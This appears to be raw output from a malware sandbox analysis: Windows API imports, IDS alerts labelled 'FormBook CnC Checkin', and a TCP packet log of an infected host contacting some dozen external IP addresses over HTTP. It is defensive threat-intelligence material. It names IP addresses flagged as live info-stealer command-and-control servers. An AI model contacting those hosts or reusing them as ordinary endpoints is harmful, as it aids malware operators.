              ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
              OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
              Language of compilation systemCountry where language is spokenMap
              EnglishGreat Britain
              EnglishUnited States
              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
              2024-09-22T17:55:42.580558+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.114975885.159.66.9380TCP
              2024-09-22T17:55:42.580558+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.114975885.159.66.9380TCP
              2024-09-22T17:56:31.057863+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1149713148.72.152.17480TCP
              2024-09-22T17:56:31.057863+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1149713148.72.152.17480TCP
              2024-09-22T17:56:46.859354+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.11497153.33.130.19080TCP
              2024-09-22T17:56:50.154468+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.11497163.33.130.19080TCP
              2024-09-22T17:56:52.453005+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.11497173.33.130.19080TCP
              2024-09-22T17:56:54.983460+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.11497183.33.130.19080TCP
              2024-09-22T17:56:54.983460+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.11497183.33.130.19080TCP
              2024-09-22T17:57:01.234484+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149719172.191.244.6280TCP
              2024-09-22T17:57:03.777150+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149720172.191.244.6280TCP
              2024-09-22T17:57:06.378235+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149721172.191.244.6280TCP
              2024-09-22T17:57:08.880515+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1149722172.191.244.6280TCP
              2024-09-22T17:57:08.880515+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1149722172.191.244.6280TCP
              2024-09-22T17:57:15.083334+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149723172.96.191.3980TCP
              2024-09-22T17:57:17.656021+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149724172.96.191.3980TCP
              2024-09-22T17:57:20.198719+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149725172.96.191.3980TCP
              2024-09-22T17:57:22.792031+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1149726172.96.191.3980TCP
              2024-09-22T17:57:22.792031+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1149726172.96.191.3980TCP
              2024-09-22T17:57:28.617279+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149727217.70.184.5080TCP
              2024-09-22T17:57:31.226921+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149728217.70.184.5080TCP
              2024-09-22T17:57:33.725982+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149729217.70.184.5080TCP
              2024-09-22T17:57:36.300756+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1149730217.70.184.5080TCP
              2024-09-22T17:57:36.300756+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1149730217.70.184.5080TCP
              2024-09-22T17:57:42.678589+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114973163.250.47.4080TCP
              2024-09-22T17:57:45.205488+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114973263.250.47.4080TCP
              2024-09-22T17:57:47.726202+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114973363.250.47.4080TCP
              2024-09-22T17:57:50.315546+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.114973463.250.47.4080TCP
              2024-09-22T17:57:50.315546+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.114973463.250.47.4080TCP
              2024-09-22T17:57:56.071349+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114973591.184.0.20080TCP
              2024-09-22T17:57:58.670257+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114973691.184.0.20080TCP
              2024-09-22T17:58:01.264882+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114973791.184.0.20080TCP
              2024-09-22T17:58:03.670027+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.114973891.184.0.20080TCP
              2024-09-22T17:58:03.670027+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.114973891.184.0.20080TCP
              2024-09-22T17:58:09.213914+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114973913.248.169.4880TCP
              2024-09-22T17:58:11.763497+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114974013.248.169.4880TCP
              2024-09-22T17:58:14.351818+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114974113.248.169.4880TCP
              2024-09-22T17:58:16.891379+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.114974213.248.169.4880TCP
              2024-09-22T17:58:16.891379+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.114974213.248.169.4880TCP
              2024-09-22T17:58:37.445319+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114974743.242.202.16980TCP
              2024-09-22T17:58:39.997886+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114974843.242.202.16980TCP
              2024-09-22T17:58:42.837635+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114974943.242.202.16980TCP
              2024-09-22T17:58:45.222220+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.114975043.242.202.16980TCP
              2024-09-22T17:58:45.222220+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.114975043.242.202.16980TCP
              2024-09-22T17:58:51.303631+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149751103.224.182.24280TCP
              2024-09-22T17:58:54.019288+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149752103.224.182.24280TCP
              2024-09-22T17:58:56.516909+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149753103.224.182.24280TCP
              2024-09-22T17:58:59.133280+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1149754103.224.182.24280TCP
              2024-09-22T17:58:59.133280+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1149754103.224.182.24280TCP
              2024-09-22T17:59:05.784024+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114975585.159.66.9380TCP
              2024-09-22T17:59:08.330847+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114975685.159.66.9380TCP
              2024-09-22T17:59:11.705847+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114975785.159.66.9380TCP
              TimestampSource PortDest PortSource IPDest IP
              Sep 22, 2024 17:56:30.540553093 CEST4971380192.168.2.11148.72.152.174
              Sep 22, 2024 17:56:30.545486927 CEST8049713148.72.152.174192.168.2.11
              Sep 22, 2024 17:56:30.545597076 CEST4971380192.168.2.11148.72.152.174
              Sep 22, 2024 17:56:30.553241968 CEST4971380192.168.2.11148.72.152.174
              Sep 22, 2024 17:56:30.558134079 CEST8049713148.72.152.174192.168.2.11
              Sep 22, 2024 17:56:31.057605028 CEST8049713148.72.152.174192.168.2.11
              Sep 22, 2024 17:56:31.057655096 CEST8049713148.72.152.174192.168.2.11
              Sep 22, 2024 17:56:31.057862997 CEST4971380192.168.2.11148.72.152.174
              Sep 22, 2024 17:56:31.061078072 CEST4971380192.168.2.11148.72.152.174
              Sep 22, 2024 17:56:31.279407024 CEST8049713148.72.152.174192.168.2.11
              Sep 22, 2024 17:56:31.279489040 CEST4971380192.168.2.11148.72.152.174
              Sep 22, 2024 17:56:31.279980898 CEST8049713148.72.152.174192.168.2.11
              Sep 22, 2024 17:56:46.133799076 CEST4971580192.168.2.113.33.130.190
              Sep 22, 2024 17:56:46.145349026 CEST80497153.33.130.190192.168.2.11
              Sep 22, 2024 17:56:46.145447969 CEST4971580192.168.2.113.33.130.190
              Sep 22, 2024 17:56:46.156332016 CEST4971580192.168.2.113.33.130.190
              Sep 22, 2024 17:56:46.177345037 CEST80497153.33.130.190192.168.2.11
              Sep 22, 2024 17:56:46.859287977 CEST80497153.33.130.190192.168.2.11
              Sep 22, 2024 17:56:46.859354019 CEST4971580192.168.2.113.33.130.190
              Sep 22, 2024 17:56:47.658735037 CEST4971580192.168.2.113.33.130.190
              Sep 22, 2024 17:56:47.670985937 CEST80497153.33.130.190192.168.2.11
              Sep 22, 2024 17:56:48.677362919 CEST4971680192.168.2.113.33.130.190
              Sep 22, 2024 17:56:48.689383984 CEST80497163.33.130.190192.168.2.11
              Sep 22, 2024 17:56:48.689568043 CEST4971680192.168.2.113.33.130.190
              Sep 22, 2024 17:56:48.700241089 CEST4971680192.168.2.113.33.130.190
              Sep 22, 2024 17:56:48.716378927 CEST80497163.33.130.190192.168.2.11
              Sep 22, 2024 17:56:50.154365063 CEST80497163.33.130.190192.168.2.11
              Sep 22, 2024 17:56:50.154468060 CEST4971680192.168.2.113.33.130.190
              Sep 22, 2024 17:56:50.205718994 CEST4971680192.168.2.113.33.130.190
              Sep 22, 2024 17:56:50.210725069 CEST80497163.33.130.190192.168.2.11
              Sep 22, 2024 17:56:51.224469900 CEST4971780192.168.2.113.33.130.190
              Sep 22, 2024 17:56:51.921197891 CEST80497173.33.130.190192.168.2.11
              Sep 22, 2024 17:56:51.921439886 CEST4971780192.168.2.113.33.130.190
              Sep 22, 2024 17:56:51.932121992 CEST4971780192.168.2.113.33.130.190
              Sep 22, 2024 17:56:51.950597048 CEST80497173.33.130.190192.168.2.11
              Sep 22, 2024 17:56:51.951963902 CEST80497173.33.130.190192.168.2.11
              Sep 22, 2024 17:56:52.452899933 CEST80497173.33.130.190192.168.2.11
              Sep 22, 2024 17:56:52.453005075 CEST4971780192.168.2.113.33.130.190
              Sep 22, 2024 17:56:53.440031052 CEST4971780192.168.2.113.33.130.190
              Sep 22, 2024 17:56:53.449975967 CEST80497173.33.130.190192.168.2.11
              Sep 22, 2024 17:56:54.458707094 CEST4971880192.168.2.113.33.130.190
              Sep 22, 2024 17:56:54.465552092 CEST80497183.33.130.190192.168.2.11
              Sep 22, 2024 17:56:54.465652943 CEST4971880192.168.2.113.33.130.190
              Sep 22, 2024 17:56:54.472786903 CEST4971880192.168.2.113.33.130.190
              Sep 22, 2024 17:56:54.495862961 CEST80497183.33.130.190192.168.2.11
              Sep 22, 2024 17:56:54.979166031 CEST80497183.33.130.190192.168.2.11
              Sep 22, 2024 17:56:54.983318090 CEST80497183.33.130.190192.168.2.11
              Sep 22, 2024 17:56:54.983459949 CEST4971880192.168.2.113.33.130.190
              Sep 22, 2024 17:56:54.984267950 CEST4971880192.168.2.113.33.130.190
              Sep 22, 2024 17:56:54.994522095 CEST80497183.33.130.190192.168.2.11
              Sep 22, 2024 17:57:00.762267113 CEST4971980192.168.2.11172.191.244.62
              Sep 22, 2024 17:57:00.767182112 CEST8049719172.191.244.62192.168.2.11
              Sep 22, 2024 17:57:00.767260075 CEST4971980192.168.2.11172.191.244.62
              Sep 22, 2024 17:57:00.777945995 CEST4971980192.168.2.11172.191.244.62
              Sep 22, 2024 17:57:00.782867908 CEST8049719172.191.244.62192.168.2.11
              Sep 22, 2024 17:57:01.233937025 CEST8049719172.191.244.62192.168.2.11
              Sep 22, 2024 17:57:01.234388113 CEST8049719172.191.244.62192.168.2.11
              Sep 22, 2024 17:57:01.234483957 CEST4971980192.168.2.11172.191.244.62
              Sep 22, 2024 17:57:02.283837080 CEST4971980192.168.2.11172.191.244.62
              Sep 22, 2024 17:57:03.302474022 CEST4972080192.168.2.11172.191.244.62
              Sep 22, 2024 17:57:03.307607889 CEST8049720172.191.244.62192.168.2.11
              Sep 22, 2024 17:57:03.307737112 CEST4972080192.168.2.11172.191.244.62
              Sep 22, 2024 17:57:03.318303108 CEST4972080192.168.2.11172.191.244.62
              Sep 22, 2024 17:57:03.323205948 CEST8049720172.191.244.62192.168.2.11
              Sep 22, 2024 17:57:03.776998043 CEST8049720172.191.244.62192.168.2.11
              Sep 22, 2024 17:57:03.777045965 CEST8049720172.191.244.62192.168.2.11
              Sep 22, 2024 17:57:03.777149916 CEST4972080192.168.2.11172.191.244.62
              Sep 22, 2024 17:57:04.830743074 CEST4972080192.168.2.11172.191.244.62
              Sep 22, 2024 17:57:05.850780964 CEST4972180192.168.2.11172.191.244.62
              Sep 22, 2024 17:57:05.855782986 CEST8049721172.191.244.62192.168.2.11
              Sep 22, 2024 17:57:05.855902910 CEST4972180192.168.2.11172.191.244.62
              Sep 22, 2024 17:57:05.868606091 CEST4972180192.168.2.11172.191.244.62
              Sep 22, 2024 17:57:05.873689890 CEST8049721172.191.244.62192.168.2.11
              Sep 22, 2024 17:57:05.873719931 CEST8049721172.191.244.62192.168.2.11
              Sep 22, 2024 17:57:06.378089905 CEST8049721172.191.244.62192.168.2.11
              Sep 22, 2024 17:57:06.378113031 CEST8049721172.191.244.62192.168.2.11
              Sep 22, 2024 17:57:06.378235102 CEST4972180192.168.2.11172.191.244.62
              Sep 22, 2024 17:57:07.377646923 CEST4972180192.168.2.11172.191.244.62
              Sep 22, 2024 17:57:08.402479887 CEST4972280192.168.2.11172.191.244.62
              Sep 22, 2024 17:57:08.407289982 CEST8049722172.191.244.62192.168.2.11
              Sep 22, 2024 17:57:08.407546043 CEST4972280192.168.2.11172.191.244.62
              Sep 22, 2024 17:57:08.417491913 CEST4972280192.168.2.11172.191.244.62
              Sep 22, 2024 17:57:08.423029900 CEST8049722172.191.244.62192.168.2.11
              Sep 22, 2024 17:57:08.880345106 CEST8049722172.191.244.62192.168.2.11
              Sep 22, 2024 17:57:08.880388975 CEST8049722172.191.244.62192.168.2.11
              Sep 22, 2024 17:57:08.880515099 CEST4972280192.168.2.11172.191.244.62
              Sep 22, 2024 17:57:08.884234905 CEST4972280192.168.2.11172.191.244.62
              Sep 22, 2024 17:57:08.889029980 CEST8049722172.191.244.62192.168.2.11
              Sep 22, 2024 17:57:14.174263000 CEST4972380192.168.2.11172.96.191.39
              Sep 22, 2024 17:57:14.179251909 CEST8049723172.96.191.39192.168.2.11
              Sep 22, 2024 17:57:14.179426908 CEST4972380192.168.2.11172.96.191.39
              Sep 22, 2024 17:57:14.189800024 CEST4972380192.168.2.11172.96.191.39
              Sep 22, 2024 17:57:14.194792986 CEST8049723172.96.191.39192.168.2.11
              Sep 22, 2024 17:57:15.083090067 CEST8049723172.96.191.39192.168.2.11
              Sep 22, 2024 17:57:15.083141088 CEST8049723172.96.191.39192.168.2.11
              Sep 22, 2024 17:57:15.083333969 CEST4972380192.168.2.11172.96.191.39
              Sep 22, 2024 17:57:15.705725908 CEST4972380192.168.2.11172.96.191.39
              Sep 22, 2024 17:57:16.724622011 CEST4972480192.168.2.11172.96.191.39
              Sep 22, 2024 17:57:16.729552031 CEST8049724172.96.191.39192.168.2.11
              Sep 22, 2024 17:57:16.729677916 CEST4972480192.168.2.11172.96.191.39
              Sep 22, 2024 17:57:16.743340015 CEST4972480192.168.2.11172.96.191.39
              Sep 22, 2024 17:57:16.748255968 CEST8049724172.96.191.39192.168.2.11
              Sep 22, 2024 17:57:17.653750896 CEST8049724172.96.191.39192.168.2.11
              Sep 22, 2024 17:57:17.655967951 CEST8049724172.96.191.39192.168.2.11
              Sep 22, 2024 17:57:17.656021118 CEST4972480192.168.2.11172.96.191.39
              Sep 22, 2024 17:57:18.252613068 CEST4972480192.168.2.11172.96.191.39
              Sep 22, 2024 17:57:19.279412031 CEST4972580192.168.2.11172.96.191.39
              Sep 22, 2024 17:57:19.284358025 CEST8049725172.96.191.39192.168.2.11
              Sep 22, 2024 17:57:19.285567045 CEST4972580192.168.2.11172.96.191.39
              Sep 22, 2024 17:57:19.297406912 CEST4972580192.168.2.11172.96.191.39
              Sep 22, 2024 17:57:19.302316904 CEST8049725172.96.191.39192.168.2.11
              Sep 22, 2024 17:57:19.302398920 CEST8049725172.96.191.39192.168.2.11
              Sep 22, 2024 17:57:20.198420048 CEST8049725172.96.191.39192.168.2.11
              Sep 22, 2024 17:57:20.198654890 CEST8049725172.96.191.39192.168.2.11
              Sep 22, 2024 17:57:20.198719025 CEST4972580192.168.2.11172.96.191.39
              Sep 22, 2024 17:57:20.799424887 CEST4972580192.168.2.11172.96.191.39
              Sep 22, 2024 17:57:21.818212986 CEST4972680192.168.2.11172.96.191.39
              Sep 22, 2024 17:57:21.823252916 CEST8049726172.96.191.39192.168.2.11
              Sep 22, 2024 17:57:21.823357105 CEST4972680192.168.2.11172.96.191.39
              Sep 22, 2024 17:57:21.830529928 CEST4972680192.168.2.11172.96.191.39
              Sep 22, 2024 17:57:21.835494995 CEST8049726172.96.191.39192.168.2.11
              Sep 22, 2024 17:57:22.791858912 CEST8049726172.96.191.39192.168.2.11
              Sep 22, 2024 17:57:22.791891098 CEST8049726172.96.191.39192.168.2.11
              Sep 22, 2024 17:57:22.792031050 CEST4972680192.168.2.11172.96.191.39
              Sep 22, 2024 17:57:22.795380116 CEST4972680192.168.2.11172.96.191.39
              Sep 22, 2024 17:57:22.800247908 CEST8049726172.96.191.39192.168.2.11
              Sep 22, 2024 17:57:27.954507113 CEST4972780192.168.2.11217.70.184.50
              Sep 22, 2024 17:57:27.959368944 CEST8049727217.70.184.50192.168.2.11
              Sep 22, 2024 17:57:27.963478088 CEST4972780192.168.2.11217.70.184.50
              Sep 22, 2024 17:57:27.983398914 CEST4972780192.168.2.11217.70.184.50
              Sep 22, 2024 17:57:27.988225937 CEST8049727217.70.184.50192.168.2.11
              Sep 22, 2024 17:57:28.617199898 CEST8049727217.70.184.50192.168.2.11
              Sep 22, 2024 17:57:28.617222071 CEST8049727217.70.184.50192.168.2.11
              Sep 22, 2024 17:57:28.617279053 CEST4972780192.168.2.11217.70.184.50
              Sep 22, 2024 17:57:29.487371922 CEST4972780192.168.2.11217.70.184.50
              Sep 22, 2024 17:57:30.506380081 CEST4972880192.168.2.11217.70.184.50
              Sep 22, 2024 17:57:30.578572035 CEST8049728217.70.184.50192.168.2.11
              Sep 22, 2024 17:57:30.578846931 CEST4972880192.168.2.11217.70.184.50
              Sep 22, 2024 17:57:30.589766026 CEST4972880192.168.2.11217.70.184.50
              Sep 22, 2024 17:57:30.594592094 CEST8049728217.70.184.50192.168.2.11
              Sep 22, 2024 17:57:31.226824999 CEST8049728217.70.184.50192.168.2.11
              Sep 22, 2024 17:57:31.226850033 CEST8049728217.70.184.50192.168.2.11
              Sep 22, 2024 17:57:31.226921082 CEST4972880192.168.2.11217.70.184.50
              Sep 22, 2024 17:57:32.096309900 CEST4972880192.168.2.11217.70.184.50
              Sep 22, 2024 17:57:33.116126060 CEST4972980192.168.2.11217.70.184.50
              Sep 22, 2024 17:57:33.121136904 CEST8049729217.70.184.50192.168.2.11
              Sep 22, 2024 17:57:33.121217012 CEST4972980192.168.2.11217.70.184.50
              Sep 22, 2024 17:57:33.135000944 CEST4972980192.168.2.11217.70.184.50
              Sep 22, 2024 17:57:33.139852047 CEST8049729217.70.184.50192.168.2.11
              Sep 22, 2024 17:57:33.139925957 CEST8049729217.70.184.50192.168.2.11
              Sep 22, 2024 17:57:33.725753069 CEST8049729217.70.184.50192.168.2.11
              Sep 22, 2024 17:57:33.725853920 CEST8049729217.70.184.50192.168.2.11
              Sep 22, 2024 17:57:33.725981951 CEST4972980192.168.2.11217.70.184.50
              Sep 22, 2024 17:57:34.646032095 CEST4972980192.168.2.11217.70.184.50
              Sep 22, 2024 17:57:35.661792994 CEST4973080192.168.2.11217.70.184.50
              Sep 22, 2024 17:57:35.666999102 CEST8049730217.70.184.50192.168.2.11
              Sep 22, 2024 17:57:35.667162895 CEST4973080192.168.2.11217.70.184.50
              Sep 22, 2024 17:57:35.674160004 CEST4973080192.168.2.11217.70.184.50
              Sep 22, 2024 17:57:35.679053068 CEST8049730217.70.184.50192.168.2.11
              Sep 22, 2024 17:57:36.300060987 CEST8049730217.70.184.50192.168.2.11
              Sep 22, 2024 17:57:36.300139904 CEST8049730217.70.184.50192.168.2.11
              Sep 22, 2024 17:57:36.300173998 CEST8049730217.70.184.50192.168.2.11
              Sep 22, 2024 17:57:36.300755978 CEST4973080192.168.2.11217.70.184.50
              Sep 22, 2024 17:57:36.303337097 CEST4973080192.168.2.11217.70.184.50
              Sep 22, 2024 17:57:36.308157921 CEST8049730217.70.184.50192.168.2.11
              Sep 22, 2024 17:57:42.037802935 CEST4973180192.168.2.1163.250.47.40
              Sep 22, 2024 17:57:42.043740988 CEST804973163.250.47.40192.168.2.11
              Sep 22, 2024 17:57:42.043814898 CEST4973180192.168.2.1163.250.47.40
              Sep 22, 2024 17:57:42.055665970 CEST4973180192.168.2.1163.250.47.40
              Sep 22, 2024 17:57:42.060614109 CEST804973163.250.47.40192.168.2.11
              Sep 22, 2024 17:57:42.678194046 CEST804973163.250.47.40192.168.2.11
              Sep 22, 2024 17:57:42.678411961 CEST804973163.250.47.40192.168.2.11
              Sep 22, 2024 17:57:42.678589106 CEST4973180192.168.2.1163.250.47.40
              Sep 22, 2024 17:57:43.565439939 CEST4973180192.168.2.1163.250.47.40
              Sep 22, 2024 17:57:44.583918095 CEST4973280192.168.2.1163.250.47.40
              Sep 22, 2024 17:57:44.589036942 CEST804973263.250.47.40192.168.2.11
              Sep 22, 2024 17:57:44.589143991 CEST4973280192.168.2.1163.250.47.40
              Sep 22, 2024 17:57:44.600519896 CEST4973280192.168.2.1163.250.47.40
              Sep 22, 2024 17:57:44.605477095 CEST804973263.250.47.40192.168.2.11
              Sep 22, 2024 17:57:45.203596115 CEST804973263.250.47.40192.168.2.11
              Sep 22, 2024 17:57:45.203728914 CEST804973263.250.47.40192.168.2.11
              Sep 22, 2024 17:57:45.205487967 CEST4973280192.168.2.1163.250.47.40
              Sep 22, 2024 17:57:46.113060951 CEST4973280192.168.2.1163.250.47.40
              Sep 22, 2024 17:57:47.130522013 CEST4973380192.168.2.1163.250.47.40
              Sep 22, 2024 17:57:47.135484934 CEST804973363.250.47.40192.168.2.11
              Sep 22, 2024 17:57:47.135567904 CEST4973380192.168.2.1163.250.47.40
              Sep 22, 2024 17:57:47.146550894 CEST4973380192.168.2.1163.250.47.40
              Sep 22, 2024 17:57:47.151983976 CEST804973363.250.47.40192.168.2.11
              Sep 22, 2024 17:57:47.153680086 CEST804973363.250.47.40192.168.2.11
              Sep 22, 2024 17:57:47.725965023 CEST804973363.250.47.40192.168.2.11
              Sep 22, 2024 17:57:47.726146936 CEST804973363.250.47.40192.168.2.11
              Sep 22, 2024 17:57:47.726202011 CEST4973380192.168.2.1163.250.47.40
              Sep 22, 2024 17:57:48.658931017 CEST4973380192.168.2.1163.250.47.40
              Sep 22, 2024 17:57:49.677831888 CEST4973480192.168.2.1163.250.47.40
              Sep 22, 2024 17:57:49.683573961 CEST804973463.250.47.40192.168.2.11
              Sep 22, 2024 17:57:49.683701038 CEST4973480192.168.2.1163.250.47.40
              Sep 22, 2024 17:57:49.690640926 CEST4973480192.168.2.1163.250.47.40
              Sep 22, 2024 17:57:49.699286938 CEST804973463.250.47.40192.168.2.11
              Sep 22, 2024 17:57:50.309072971 CEST804973463.250.47.40192.168.2.11
              Sep 22, 2024 17:57:50.311563969 CEST804973463.250.47.40192.168.2.11
              Sep 22, 2024 17:57:50.315546036 CEST4973480192.168.2.1163.250.47.40
              Sep 22, 2024 17:57:50.323410034 CEST4973480192.168.2.1163.250.47.40
              Sep 22, 2024 17:57:50.328301907 CEST804973463.250.47.40192.168.2.11
              Sep 22, 2024 17:57:55.359673977 CEST4973580192.168.2.1191.184.0.200
              Sep 22, 2024 17:57:55.364676952 CEST804973591.184.0.200192.168.2.11
              Sep 22, 2024 17:57:55.364756107 CEST4973580192.168.2.1191.184.0.200
              Sep 22, 2024 17:57:55.377249956 CEST4973580192.168.2.1191.184.0.200
              Sep 22, 2024 17:57:55.382201910 CEST804973591.184.0.200192.168.2.11
              Sep 22, 2024 17:57:56.067904949 CEST804973591.184.0.200192.168.2.11
              Sep 22, 2024 17:57:56.070811987 CEST804973591.184.0.200192.168.2.11
              Sep 22, 2024 17:57:56.071348906 CEST4973580192.168.2.1191.184.0.200
              Sep 22, 2024 17:57:56.893294096 CEST4973580192.168.2.1191.184.0.200
              Sep 22, 2024 17:57:57.913880110 CEST4973680192.168.2.1191.184.0.200
              Sep 22, 2024 17:57:57.932570934 CEST804973691.184.0.200192.168.2.11
              Sep 22, 2024 17:57:57.932912111 CEST4973680192.168.2.1191.184.0.200
              Sep 22, 2024 17:57:57.945789099 CEST4973680192.168.2.1191.184.0.200
              Sep 22, 2024 17:57:57.962521076 CEST804973691.184.0.200192.168.2.11
              Sep 22, 2024 17:57:58.667346001 CEST804973691.184.0.200192.168.2.11
              Sep 22, 2024 17:57:58.670191050 CEST804973691.184.0.200192.168.2.11
              Sep 22, 2024 17:57:58.670257092 CEST4973680192.168.2.1191.184.0.200
              Sep 22, 2024 17:57:59.456046104 CEST4973680192.168.2.1191.184.0.200
              Sep 22, 2024 17:58:00.475219011 CEST4973780192.168.2.1191.184.0.200
              Sep 22, 2024 17:58:00.480299950 CEST804973791.184.0.200192.168.2.11
              Sep 22, 2024 17:58:00.480381012 CEST4973780192.168.2.1191.184.0.200
              Sep 22, 2024 17:58:00.491586924 CEST4973780192.168.2.1191.184.0.200
              Sep 22, 2024 17:58:00.496548891 CEST804973791.184.0.200192.168.2.11
              Sep 22, 2024 17:58:00.496649981 CEST804973791.184.0.200192.168.2.11
              Sep 22, 2024 17:58:01.263776064 CEST804973791.184.0.200192.168.2.11
              Sep 22, 2024 17:58:01.264834881 CEST804973791.184.0.200192.168.2.11
              Sep 22, 2024 17:58:01.264882088 CEST4973780192.168.2.1191.184.0.200
              Sep 22, 2024 17:58:02.003410101 CEST4973780192.168.2.1191.184.0.200
              Sep 22, 2024 17:58:03.022053003 CEST4973880192.168.2.1191.184.0.200
              Sep 22, 2024 17:58:03.027218103 CEST804973891.184.0.200192.168.2.11
              Sep 22, 2024 17:58:03.027312040 CEST4973880192.168.2.1191.184.0.200
              Sep 22, 2024 17:58:03.036658049 CEST4973880192.168.2.1191.184.0.200
              Sep 22, 2024 17:58:03.041851997 CEST804973891.184.0.200192.168.2.11
              Sep 22, 2024 17:58:03.668576002 CEST804973891.184.0.200192.168.2.11
              Sep 22, 2024 17:58:03.668988943 CEST804973891.184.0.200192.168.2.11
              Sep 22, 2024 17:58:03.670027018 CEST4973880192.168.2.1191.184.0.200
              Sep 22, 2024 17:58:03.675446033 CEST4973880192.168.2.1191.184.0.200
              Sep 22, 2024 17:58:03.680310965 CEST804973891.184.0.200192.168.2.11
              Sep 22, 2024 17:58:08.749552011 CEST4973980192.168.2.1113.248.169.48
              Sep 22, 2024 17:58:08.754403114 CEST804973913.248.169.48192.168.2.11
              Sep 22, 2024 17:58:08.754473925 CEST4973980192.168.2.1113.248.169.48
              Sep 22, 2024 17:58:08.765122890 CEST4973980192.168.2.1113.248.169.48
              Sep 22, 2024 17:58:08.769982100 CEST804973913.248.169.48192.168.2.11
              Sep 22, 2024 17:58:09.213850021 CEST804973913.248.169.48192.168.2.11
              Sep 22, 2024 17:58:09.213913918 CEST4973980192.168.2.1113.248.169.48
              Sep 22, 2024 17:58:10.271430016 CEST4973980192.168.2.1113.248.169.48
              Sep 22, 2024 17:58:10.276577950 CEST804973913.248.169.48192.168.2.11
              Sep 22, 2024 17:58:11.291055918 CEST4974080192.168.2.1113.248.169.48
              Sep 22, 2024 17:58:11.296814919 CEST804974013.248.169.48192.168.2.11
              Sep 22, 2024 17:58:11.296886921 CEST4974080192.168.2.1113.248.169.48
              Sep 22, 2024 17:58:11.325226068 CEST4974080192.168.2.1113.248.169.48
              Sep 22, 2024 17:58:11.330290079 CEST804974013.248.169.48192.168.2.11
              Sep 22, 2024 17:58:11.761425018 CEST804974013.248.169.48192.168.2.11
              Sep 22, 2024 17:58:11.763497114 CEST4974080192.168.2.1113.248.169.48
              Sep 22, 2024 17:58:12.830746889 CEST4974080192.168.2.1113.248.169.48
              Sep 22, 2024 17:58:12.835750103 CEST804974013.248.169.48192.168.2.11
              Sep 22, 2024 17:58:13.849313974 CEST4974180192.168.2.1113.248.169.48
              Sep 22, 2024 17:58:13.854491949 CEST804974113.248.169.48192.168.2.11
